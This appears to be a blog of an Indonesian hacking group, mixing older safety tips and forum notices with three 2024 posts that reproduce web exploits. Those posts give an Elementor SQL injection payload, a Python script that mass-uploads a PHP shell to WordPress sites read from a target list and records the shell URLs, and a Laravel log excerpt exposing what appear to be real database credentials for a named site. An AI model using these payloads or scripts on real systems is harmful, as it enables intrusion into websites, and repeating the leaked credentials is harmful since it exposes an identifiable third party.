BogorHackers Crew

25/04/2024

Elementor Website Builder < 3.12.2 - Admin+ SQLi

: CVE-2023-0329
.Coders

Burp Suite.
Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080.
a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080.
the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page.
the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL":

: http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2); #
"Replace URL" on the Replace URL page. Burp Suite should intercept the request.
the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward".
server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection.
: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.

25/04/2024

# Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)
# Date: 2024-02-25
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox

import sys , requests, re , json
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)

headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;
Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like
Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate', 'Accept-Language':
'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}

uploader = """
GIF89a




Resultz

Uploader

Uploaded






"""
requests.urllib3.disable_warnings()

def Exploit(Domain):
try:
if 'http' in Domain:
Domain = Domain
else:
Domain = 'http://'+Domain
myup = {'': ('db.php', uploader)}
req = requests.post(Domain +
'/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',
files=myup, headers=headers,verify=False, timeout=10).text
req1 = requests.get(Domain +
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')
if 'Ex3ptionaL' in req1:
print (fg+'[+] '+ Domain + ' --> Shell Uploaded')
open('Shellz.txt', 'a').write(Domain +
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n')
else:
print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability')
except:
print(fr+' -| ' + Domain + ' --> {} [Failed]')

target = open(input(fm+"Site List: "), "r").read().splitlines()
mp = Pool(int(input(fm+"Threads: ")))
mp.map(Exploit, target)
mp.close()
mp.join()

25/04/2024

# Exploit Title: Laravel Framework 11 - Credential Leakage
# Google Dork: N/A
# Date: [2024-04-19]
# Exploit Author: Huseein Amer
# Vendor Homepage: [https://laravel.com/]
# Software Link: N/A
# Version: 8.* - 11.* (REQUIRED)
# Tested on: [N/A]
# CVE : CVE-2024-29291

Proof of concept:
Go to any Laravel-based website and navigate to storage/logs/laravel.log.

Open the file and search for "PDO->__construct('mysql:host=".
The result:
shell
Copy code
#0
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70):
PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0',
Array)
#1
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46):
Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...',
'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
Credentials:
Username: u429384055_jscv
Password: Jaly$$a0p0p0p0
Host: sql1...

22/10/2014

Download Script Website Portal - bukulokomedia

Luangkan waktu anda yang berharga untuk memberikan komentarnyasedikit komentar anda sangat berharga bagi pekembangan blog ini

30/01/2012

*.5 KIAT AMAN UNTUK PARA GAMERS.*

Berikut 5 kiat aman untuk ngegame di dunia maya yang
diramu BogorHacker Crew.

1. Gunakan selalu
antivirus yang terupdate secara berkala dan solusi keamanan komputer yang memiliki fitur anti spyware dan firewall.
2. Gunakan password untuk account yang berbeda dan buatlah password yang sulit ditebak, serta jangan membuat yang terlalu sederhana.
3. Ketiklah URL atau website game online yang diinginkan langsung di browser atau manfaatkan
bookmark yang ada di browser. Dengan begitu Anda akan terhindar dari unsur ketidaksengajaan mengklik link online game dari search engine yang telah terinfeksi.
4. Lindungi data dengan membuat password pelindung baik di komputer maupun di cloud.
5. Jangan pernah gunakan software hasil crack, karena
bisa jadi itu adalah software jahat atau malicious software.

“Performa tinggi
dan tidak mempengaruhi kualitas game yang dimainkan. Dua hal tersebut menjadi indikator penting dalam memilih software
antivirus,”

kata Marcel ‘k1llsen’ Paul, seorang e-sports gamer yang saat ini menduduki peringkat atas pada top gaming league ESC di Jerman.
“Sebagaimana seorang e-sports
professional, menurut saya setiap gangguan dapat berakibat pada kerugian kita sendiri,”

moga bermafaat.

http://forum.bogor-h.org

30/01/2012

Kejahatan yang saat ini marak dilakukan di dalam angkutan kota menciptakan kekhawatiran tersendiri bagi masyarakat.

Supaya Anda tidak menjadi korbannya, berikut ini tips yang diberikan kami, seperti yang dilansir dari TMC Polda Metro Jaya.

*.Hindari memakai dan memperlihatkan
barang berharga di depan umum,
seperti perhiasan dan handphone.
*.Pakailah baju yang sopan dan tertutup.
*.Selektif dalam memilih angkutan kota(angkot),
pilihlah angkot dengan kaca bening, sopir berseragam,
ada ID Card, dan
ada lampu penerangan di dalamnya.
*.Pastikan
Anda mengetahui
nomor trayek dan tujuannya.
*.Hindari tidur
di dalam angkot, hindari menerima makanan atau minuman dari orang lain yang baru Anda kenal, dan tetap waspada terhadap penumpang lain.
apabila ada
tanda-tanda mencurigakan, lebih baik Anda segera turun di tempat yang aman.
*.Selalu ingat, bila perlu disimpan dalam kotak handphone
atau dicatat nomor-nomor penting yang bisa dihubungi pada saat darurat.
*.Lebih baik ada seorang teman yang mendampingi Anda saat naik angkot,
khususnya pada malam hari.
*.Jika penumpang mendapati kejadian/tindakan kejahatan
(melanggar hukum/melakukan tindak pidana),
segera melaporkan kepada kepolisian terdekat atau menghubungi
TMC Polda Metro Jaya di nomor 0215276001 dan SMS 1717.

moga bermamfaat..

http://forum.bogor-h.org

19/01/2012

Silahkan kirimkan program anda. untuk index depan situs kami.

11/01/2012

masih ada yang melek kah ?

21/12/2011

02/12/2011

Untuk semua bhc_member,
untuk sementara forum bisa di akses dengan url http://bhcrew.forumleaks.net/

29/11/2011

Mohon maaf kepada semua BHC_MEMBER
Di karenakan nya domain bogorhacker.com sudah expired, dan kami para admin juga tidak bisa melunasinya..
maka dengan terpaksa domain bogorhacker.com kami alihkan ke facebook,
karena kami mengharapkan semua BHC_MEMBER Berkumpul disni..

mohon bersabar untuk selanjutnya.
kami akan usahakan yang terbaik
terima kasih..